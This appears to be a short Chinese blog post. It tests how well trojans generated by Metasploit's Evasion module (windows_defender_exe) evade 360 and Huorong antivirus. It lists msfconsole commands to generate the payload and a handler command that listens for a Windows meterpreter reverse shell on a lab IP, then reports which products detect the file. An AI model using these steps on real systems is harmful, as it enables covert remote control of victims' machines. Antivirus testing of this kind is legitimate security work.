kali升级到5.0之后,有了一个新的模块Evasion,这个文章我就去测试一下Evasion生成的木马的实际免杀效果。
360版本:13.0.0.2002 备用木马库:2021-10-05
360杀毒:5.0.0.8140
火绒版本:5.0.63.2 病毒库:2021-09-29
Evasion使用
msfconsole进入msf
show evasion 查看Evasion所提供的模块
一、evasion/windows/windows_defender_exe模块
命令:use evasion/windows/windows_defender_exe 进入模块,设置对应的选项生成payload
这里filename是生成的payload文件名,可以自己设置,我使用的是默认的。
exploit 生成payload
使用命令:handler -H 192.168.64.133 -P 7890 -p windows/meterpreter/reverse_tcp 快速监听端口
使用命令:jobs 查看监听
测试
关闭杀软的情况下可正常上线。
开启火绒被杀
开启360,未报毒,可连接 但是用360杀毒扫描还是可以扫描出来
virustotal报毒40/68